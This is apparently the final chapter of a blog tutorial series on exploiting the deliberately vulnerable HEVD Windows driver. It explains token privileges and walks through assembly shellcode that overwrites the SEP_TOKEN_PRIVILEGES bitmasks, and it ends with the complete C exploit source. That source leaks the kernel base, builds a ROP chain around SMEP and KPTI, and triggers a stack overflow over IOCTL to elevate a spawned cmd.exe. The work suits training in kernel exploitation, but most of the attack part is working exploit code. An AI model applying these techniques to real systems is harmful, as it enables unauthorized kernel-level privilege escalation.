[Cracking Windows Kernel with HEVD] Chapter 4: How do we write a shellcode to elevate privileges and gracefully return to userland?
The end is near
Throughout the previous four chapters, everything we have been doing was basically exploiting a stack-based buffer overflow and bypassing a few kernel mitigations. Apart from the kernel-specific memory mitigations, until this point the exploitation has been as vanilla as it gets: a stack overflow with no canary.
In this final post, we will dive into Windows privilege mechanism and use it to elevate our privileges. Then, we must return to userland. After all, there is no use in elevating privileges or executing code in ring0 if the computer is going to crash right after! The problem is we have corrupted our stack with our ROP payload. Not to mention the registers: we have corrupted them all. Restoring them would be impractical. That will be our main challenge today.
How privileges work on Windows
It would be difficult to cover how security works on Windows, or even how privileges work. I’ll cover the basics of privileges in this post. Later on I’m planning to write another post just on Windows security architecture, but with my current post scheduling, this could take as long as a century ^^ (sorry about that!)
"A privilege is the right of an account, such as a user or group account, to perform various system-related operations on the local computer, such as shutting down the system, loading device drivers or changing the system time."
That is Microsoft’s definition of privileges on Windows. Privileges are not related to securable objects (such as files and folders), but to access to system resources and system related tasks. These privileges may be observed on a Windows terminal with the whoami command: whoami /priv
.
This is what appears when a low-privilege user checks its own privileges:
Here we see an administrator:
As you may see, there are some privileges which appear only for the administrator. For each privilege, it can have a state: enabled or disabled. In reality, there are three possible attributes for a privilege: present, enabled and enabled by default. Present privileges are the ones shown by the whoami
program. These privileges may be enabled or disabled. However, if a privilege is not present, it may not be enabled. The state is kind of straightforward: if it enabled, the user may use it. Otherwise, it must be enabled. The “enabled by default” attribute is also intuitive and needs no explanation.
Ok, so these privileges are associated to the user. But what about processes?
Well, there is a structure stored in kernel associated with each process named EPROCESS. It stores another very important data structure named TOKEN. Access token objects “include the identity and privileges of the user account associated with the process or thread”, as explained by Microsoft. When a user starts a new process (or thread), the system will create a copy of its access token and store it on the process structure. If we intend to elevate privileges of a process, this is the data structure with which we will mess.
Amongst many information stored in token struct, such as security identifier (SID) for user account, SID for groups of which the user is a member, impersonation level, etc, it actually stores the privileges held by the user (or the user’s group). These are the privileges of which I have spoken earlier! This guy is a data structure called _SEP_TOKEN_PRIVILEGES
and its definition follows:
kd> dt _SEP_TOKEN_PRIVILEGES
nt!_SEP_TOKEN_PRIVILEGES
+0x000 Present : Uint8B
+0x008 Enabled : Uint8B
+0x010 EnabledByDefault : Uint8B
That’s right! Each privilege is represented by a bit in three bitmasks: present, enabled and enabled by default. Each bit is a permission from the list below:
2: SeCreateTokenPrivilege -> Create a token object
3: SeAssignPrimaryTokenPrivilege -> Replace a process-level token
4: SeLockMemoryPrivilege -> Lock pages in memory
5: SeIncreaseQuotaPrivilege -> Increase quotas
6: SeMachineAccountPrivilege -> Add workstations to the domain
7: SeTcbPrivilege -> Act as part of the operating system
8: SeSecurityPrivilege -> Manage auditing and security log
9: SeTakeOwnershipPrivilege -> Take ownership of files/objects
10: SeLoadDriverPrivilege -> Load and unload device drivers
11: SeSystemProfilePrivilege -> Profile system performance
12: SeSystemtimePrivilege -> Change the system time
13: SeProfileSingleProcessPrivilege -> Profile a single process
14: SeIncreaseBasePriorityPrivilege -> Increase scheduling priority
15: SeCreatePagefilePrivilege -> Create a pagefile
16: SeCreatePermanentPrivilege -> Create permanent shared objects
17: SeBackupPrivilege -> Backup files and directories
18: SeRestorePrivilege -> Restore files and directories
19: SeShutdownPrivilege -> Shut down the system
20: SeDebugPrivilege -> Debug programs
21: SeAuditPrivilege -> Generate security audits
22: SeSystemEnvironmentPrivilege -> Edit firmware environment values
23: SeChangeNotifyPrivilege -> Receive notifications of changes to files or directories
24: SeRemoteShutdownPrivilege -> Force shutdown from a remote system
25: SeUndockPrivilege -> Remove computer from docking station
26: SeSyncAgentPrivilege -> Synch directory service data
27: SeEnableDelegationPrivilege -> Enable user accounts to be trusted for delegation
28: SeManageVolumePrivilege -> Manage the files on a volume
29: SeImpersonatePrivilege -> Impersonate a client after authentication
30: SeCreateGlobalPrivilege -> Create global objects
31: SeTrustedCredManAccessPrivilege -> Access Credential Manager as a trusted caller
32: SeRelabelPrivilege -> Modify the mandatory integrity level of an object
33: SeIncreaseWorkingSetPrivilege -> Allocate more memory for user applications
34: SeTimeZonePrivilege -> Adjust the time zone of the computer's internal clock
35: SeCreateSymbolicLinkPrivilege -> Required to create a symbolic link
Credit where its due, this list was found here. Thank you, Volatility Foundation.
You may observe that the list starts from the number 2 and goes way up to number 35. Why does it not start at zero, like everything else in computer science? Well, the answer is far from obvious. It is so unobvious that I do not now for sure, but I suspect that the two least significant bits must be zero so it is not “mistaken” by the number -1. If a vulnerability allows for an attacker to somehow change this structure (such as this one we are exploiting), it should be easier to set it to -1.
Ok, back to the exploit. “All” we have to do is change the SEP_TOKEN_PRIVILEGES
structure, which resides in TOKEN
structure, which resides in EPROCESS
structure, to 0xffffffffc on all fields (present, enabled and enabled by default, although the last one is optional).
If we locate this structure in memory and alter it, we have our privilege escalation!
Carving a shellcode
As mentioned, we must locate the privileges structure to alter it, which resides inside the token structure. Given an EPROCESS
structure, it is trivial to find the primary token with the PsReferencePrimaryToken method. It will return the token!
To use this method, we require a EPROCESS
object. No problem! The PsLookupProcessByProcessId will give us just that, given that we provide a PID for the process.
With token structure at hand, we have to find privilege structure to alter it. The dt
command on WinDBG will reveal the offset for the structure:
It resides on offset 0x40. Neat. The steps we must take, so far, are these:
- From a PID, use
PsLookupProcessByProcessId()
function to obtain anEPROCESS
object for the process which privileges will be elevated; - From this
EPROCESS
object, obtainTOKEN
struct; - From
TOKEN
struct, obtain theSEP_TOKEN_PRIVILEGES
struct at offset 0x40; - Alter each field of this structure to 0xffffffffc
Allright. Let’s write some assembly code:
mov rcx, <PID> ;The first argument to PsLookupProcessByProcessId() is the PID number. Will be adjusted dinamically. Rcx on Windows calling convention stores the first argument.
sub rsp, 0x8; The second argument given to PsLookupProcessByProcessId() is the EPROCESS struct to be filled (it is an out argument). I'm reserving 8 bytes for this in the stack.
mov rdx, rsp; Now placing the second argument, which is a pointer to the stack (the 8 bytes we just reserved for this) to rdx. Rdx on Windows calling convention stores the second argument, remember?
movabs rbx, <ADDRESS OF PsLookupProcessByProcessId()> ;
call rbx ; Actually call the function! The EPROCESS structure will be in stack (RSP).
mov rcx, QWORD PTW [rsp] ; Moving RSP to the first and only argument of PsReferencePrimaryToken()
movabs rbx, <ADDRESS OF PsReferencePrimaryToken> ;
call rbx ; Calling PsReferencePrimaryToken! The address for the struct will be on the return value, AKA rax register!
add rax, 0x40; Adjusting the offset. Now rax points directly to SEP_TOKEN_PRIVILEGES.
movabs rcx, 0xfffffffc ; The value of each SEP_TOKEN_PRIVILEGES is moved to rcx.
mov QWORD PTR [rax], rcx ; Now the magic happens! We change the first field in SEP_TOKEN_PRIVILEGES to 0xfffffffc.
add rax, 0x8 ; Next field...
mov QWORD PTR [rax], rcx ; Changing the second field.
add rax, 0x8 ; Final field
mov QWORD PTR [rax], rcx ; Changing the third field.
There is one more thing we should do, which is return to userland gracefully.
Kristal discovered a nice approach to return to userland with sysret. Sysret is to syscall just as ret is to call, but with extra steps.
In reality, upon a normal return to userland, the OS restores the execution context and returns gracefully. What Kristal did, and I incentivate you to read his post, is to mimic the way the OS returns to userland. His approach did not work here because KPTI was enabled.
Windows has two approaches for returning. One for when KPTI is disabled and other for when it is enabled. Kristal - or any other person as far as I know - has not developed an approach for when KPTI is enabled. Well, neither did I.
Windows has a specific function to return to userland. It is called KiKernelSysretExit()
. The first and naive approach I did was to jump to that function at the end of my shellcode and let the kernel do the hard lifting, instead of I doing it myself at the shellcode. And, to my surprise, it actually worked.
I added two extra lines to the shellcode:
movabs rbx, <ADDRESS_TO_SYSRET_KERNEL_FUNCTION>;
jmp rbx;
And the kernel did the rest!
I used my boy’s Vinicius brilliant shellcoding tools to transform my assembly code into opcodes. Then I put it in a variable and adjusted the addresses in runtime. My generate_shellcode()
function looks like this now:
char *generate_shellcode() {
char *shellcode = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x4e+11); //0x4e+11 is the size of the shellcode
memcpy(shellcode, "\x48\xc7\xc1\x78\x56\x34\x12\x48\x83\xec\x08\x48\x89\xe2\x48\xbb\x00\x00\x00\x00\xff\xff\xff\xff\xff\xd3\x48\x8b\x0c\x24\x48\xbb\x10\x32\x34\x12\xff\xff\xff\xff\xff\xd3\x48\x83\xc0\x40\x48\xb9\xfc\xff\xff\xff\x00\x00\x00\x00\x48\x89\x08\x48\x83\xc0\x08\x48\x89\x08\x48\x83\xc0\x08\x48\x89\x08\x48\x83\xc4\x08\x48\xBB\xC0\x0D\x02\x1B\x05\xF8\xFF\xFF\xFF\xE3", 0x4e+11);
memcpy(shellcode + 3, &pid, 4); // Adjusting the PID
memcpy(shellcode + 16, &kernel_PsLookupProcessByProcessId, 8); //Adjusting the address for PsLookUpProcessByProcessId function
memcpy(shellcode + 32, &kernel_PsReferencePrimaryToken, 8); //Adjusting PsReferencePrimaryToken function address
memcpy(shellcode + 0x4e+1, &kernel_sysret, 8); // Adjusting sysret function address.
return shellcode;
}
And boom! It worked!
The final exploit
I run the exploit:
On the left, we see my exploit’s debug messages. On the right, it spawned a CMD which will have its privileges elevated. I put a whoami /priv
to assert that it is unprivileged.
When I press enter on the exploit terminal, the privileges are elevated.
Finally! The system did not crash and privileges were elevated. I will leave the full source code at the end of the post.
Conclusions
We did it! Phew, this took forever for me to write. I apologize for the extremely long delay. From this exercise, we may conclude a few things:
- Windows kernel mitigations are not that powerful. Window’s KASLR is easily bypassable when you are running from integrity level medium or above. SMEP is useful, but there is a neat gadget to bypass it easily. KPTI was the hardest enemy, but can be bypassed by allocating an executable pool and jumping to it.
- If we cannot restore the stack, we can just let the kernel do the heavy lifting by calling its own exit function.
- Assembly programming is very useful for shellcoding at this level.
Hope you enjoyed it! See you next time.
Source code
#include <iostream>
#include <string>
#include <Windows.h>
#include <Psapi.h>
// Name of the device
#define DEVICE_NAME "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)
unsigned long long g_add_rsp_20h_ret = 0xa155de;
unsigned long long g_pop_rdi_pop_r14_pop_rbx_ret = 0x20a518;
unsigned long long g_xor_ecx_ecx_mov_rax_rcx_ret = 0x38cf53;
unsigned long long g_pop_rdx_ret = 0x416748;
unsigned long long g_push_rax_pop_rbx_ret = 0x20a263;
unsigned long long g_push_rax_pop_r13_ret = 0x5af724;
unsigned long long g_xchg_r8_r13_ret = 0x2c0da6;
unsigned long long g_mov_rcx_r8_mov_rax_rcx_ret = 0x93ac7a;
unsigned long long g_pop_r8_ret = 0x2017f1;
unsigned long long g_jmp_rbx = 0x408aa2;
unsigned long long kernel_ExAllocatePoolWithTag;
unsigned long long kernel_sysret = 0xa13dc0;
unsigned long long kernel_memcpy;
DWORD pid;
typedef struct sSepTokenPrivileges {
UINT8 present;
UINT8 enabled;
UINT8 enabled_by_default;
} SEP_TOKEN_PRIVILEGES;
typedef NTSTATUS(*_PsLookupProcessByProcessId)(IN HANDLE, OUT PVOID *);
_PsLookupProcessByProcessId kernel_PsLookupProcessByProcessId;
typedef PVOID(*_PsReferencePrimaryToken)(PVOID);
_PsReferencePrimaryToken kernel_PsReferencePrimaryToken;
// Definição do número da IOCTL para o StackOverflow
#define STACK_OVERFLOW_IOCTL_NUMBER IOCTL(0x800)
// Returns kernel base address
unsigned long long get_kernel_base_addr() {
LPVOID drivers[1024];
DWORD cbNeeded;
EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);
return (unsigned long long)drivers[0];
}
// Gets the handle for the device driver
HANDLE get_handle() {
HANDLE h = CreateFileA(DEVICE_NAME,
FILE_READ_ACCESS | FILE_WRITE_ACCESS,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
NULL);
if (h == INVALID_HANDLE_VALUE) {
printf("Failed to get handle =(\n");
return NULL;
}
return h;
}
void add_to_payload(char *in_buffer, SIZE_T *offset, unsigned long long *data, SIZE_T size)
{
memcpy(in_buffer + *offset, data, size);
printf("Wrote %lx to offset %u\n", *data, *offset);
*offset += size;
}
PVOID get_kernel_symbol_addr(const char *symbol) {
PVOID kernelBaseAddr;
HMODULE userKernelHandle;
PCHAR functionAddress;
unsigned long long offset;
kernelBaseAddr = (PVOID)get_kernel_base_addr(); // Loads kernel base address
userKernelHandle = LoadLibraryA("C:\\Windows\\System32\\ntoskrnl.exe"); // Gets kernel binary
if (userKernelHandle == INVALID_HANDLE_VALUE) {
return NULL;
}
functionAddress = (PCHAR)GetProcAddress(userKernelHandle, symbol); // Finds given symbol
if (functionAddress == NULL) {
// Could not find symbol
return NULL;
}
offset = functionAddress - ((PCHAR)userKernelHandle); // Subtracts the loaded binary's base address from the found address. This way, we will find the offset of the symbol for base address 0.
return (PVOID)(((PCHAR)kernelBaseAddr) + offset); // Adds the offset to the leaked base address.
}
void adjust_offsets()
{
unsigned long long kernel_base_addr = get_kernel_base_addr();
g_xor_ecx_ecx_mov_rax_rcx_ret += kernel_base_addr;
g_pop_rdi_pop_r14_pop_rbx_ret += kernel_base_addr;
g_add_rsp_20h_ret += kernel_base_addr;
g_pop_rdx_ret += kernel_base_addr;
g_push_rax_pop_rbx_ret += kernel_base_addr;
g_push_rax_pop_r13_ret += kernel_base_addr;
g_xchg_r8_r13_ret += kernel_base_addr;
g_mov_rcx_r8_mov_rax_rcx_ret += kernel_base_addr;
g_pop_r8_ret += kernel_base_addr;
g_jmp_rbx += kernel_base_addr;
kernel_sysret += kernel_base_addr;
kernel_ExAllocatePoolWithTag = (unsigned long long) get_kernel_symbol_addr("ExAllocatePoolWithTag");
kernel_memcpy = (unsigned long long) get_kernel_symbol_addr("memcpy");
kernel_PsLookupProcessByProcessId = (_PsLookupProcessByProcessId) get_kernel_symbol_addr("PsLookupProcessByProcessId");
kernel_PsReferencePrimaryToken = (_PsReferencePrimaryToken) get_kernel_symbol_addr("PsReferencePrimaryToken");
printf("Primary token: %xu \n", (ULONGLONG)kernel_PsReferencePrimaryToken - kernel_base_addr);
printf("PsReferencePrimaryToken base addr: %xu\n", (ULONGLONG) kernel_PsReferencePrimaryToken - (ULONGLONG) kernel_base_addr);
}
DWORD spawnCmd() {
STARTUPINFO si;
PROCESS_INFORMATION pi;
char cmd[] = "C:\\Windows\\System32\\cmd.exe";
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
// Start the child process.
if (!CreateProcess(NULL, // No module name (use command line)
cmd, // Command line
NULL, // Process handle not inheritable
NULL, // Thread handle not inheritable
FALSE, // Set handle inheritance to FALSE
CREATE_NEW_CONSOLE, // No creation flags
NULL, // Use parent's environment block
NULL, // Use parent's starting directory
&si, // Pointer to STARTUPINFO structure
&pi) // Pointer to PROCESS_INFORMATION structure
)
{
printf("CreateProcess failed (%d).\n", GetLastError());
return -1;
}
return pi.dwProcessId;
}
char *generate_shellcode() {
char *shellcode = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x4e+11);
memcpy(shellcode, "\x48\xc7\xc1\x78\x56\x34\x12\x48\x83\xec\x08\x48\x89\xe2\x48\xbb\x00\x00\x00\x00\xff\xff\xff\xff\xff\xd3\x48\x8b\x0c\x24\x48\xbb\x10\x32\x34\x12\xff\xff\xff\xff\xff\xd3\x48\x83\xc0\x40\x48\xb9\xfc\xff\xff\xff\x00\x00\x00\x00\x48\x89\x08\x48\x83\xc0\x08\x48\x89\x08\x48\x83\xc0\x08\x48\x89\x08\x48\x83\xc4\x08\x48\xBB\xC0\x0D\x02\x1B\x05\xF8\xFF\xFF\xFF\xE3", 0x4e+11);
memcpy(shellcode + 3, &pid, 4);
memcpy(shellcode + 16, &kernel_PsLookupProcessByProcessId, 8);
memcpy(shellcode + 32, &kernel_PsReferencePrimaryToken, 8);
memcpy(shellcode + 0x4e+1, &kernel_sysret, 8);
return shellcode;
}
//Does everything
void do_buffer_overflow(HANDLE h)
{
SIZE_T in_buffer_size = 2072 + 8 * 15 + 0x20;
PULONG in_buffer = (PULONG)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, in_buffer_size);
memset((char *)in_buffer, 'A', in_buffer_size);
SIZE_T offset = 2072;
pid = spawnCmd();
adjust_offsets();
char *shellcode = generate_shellcode();
unsigned long long size_of_copy = 0x4e+11;
add_to_payload((char*)in_buffer, &offset, &g_xor_ecx_ecx_mov_rax_rcx_ret, 8);
add_to_payload((char*)in_buffer, &offset, &g_pop_rdx_ret, 8);
add_to_payload((char*)in_buffer, &offset, &size_of_copy, 8);
add_to_payload((char*)in_buffer, &offset, &kernel_ExAllocatePoolWithTag, 8);
add_to_payload((char*)in_buffer, &offset, &g_add_rsp_20h_ret, 8);
offset += 0x20;
add_to_payload((char*)in_buffer, &offset, &g_push_rax_pop_rbx_ret, 8);
add_to_payload((char*)in_buffer, &offset, &g_push_rax_pop_r13_ret, 8);
add_to_payload((char*)in_buffer, &offset, &g_xchg_r8_r13_ret, 8);
add_to_payload((char*)in_buffer, &offset, &g_mov_rcx_r8_mov_rax_rcx_ret, 8);
add_to_payload((char*)in_buffer, &offset, &g_pop_rdx_ret, 8);
add_to_payload((char*)in_buffer, &offset, (unsigned long long *)(&shellcode), 8);
add_to_payload((char*)in_buffer, &offset, &g_pop_r8_ret, 8);
add_to_payload((char*)in_buffer, &offset, &size_of_copy, 8);
add_to_payload((char*)in_buffer, &offset, &kernel_memcpy, 8);
add_to_payload((char*)in_buffer, &offset, &g_jmp_rbx, 8);
system("pause");
printf("Sending buffer.\n");
//Sends buffer through IOCTL
bool result = DeviceIoControl(h, STACK_OVERFLOW_IOCTL_NUMBER, in_buffer, (DWORD)in_buffer_size, NULL, 0, NULL, NULL);
if (!result)
{
printf("IOCTL Failed: %X\n", GetLastError());
}
//Frees allocated memory
HeapFree(GetProcessHeap(), 0, (LPVOID)in_buffer);
}
int main(int argc, char **argv)
{
do_buffer_overflow(get_handle());
system("pause");
}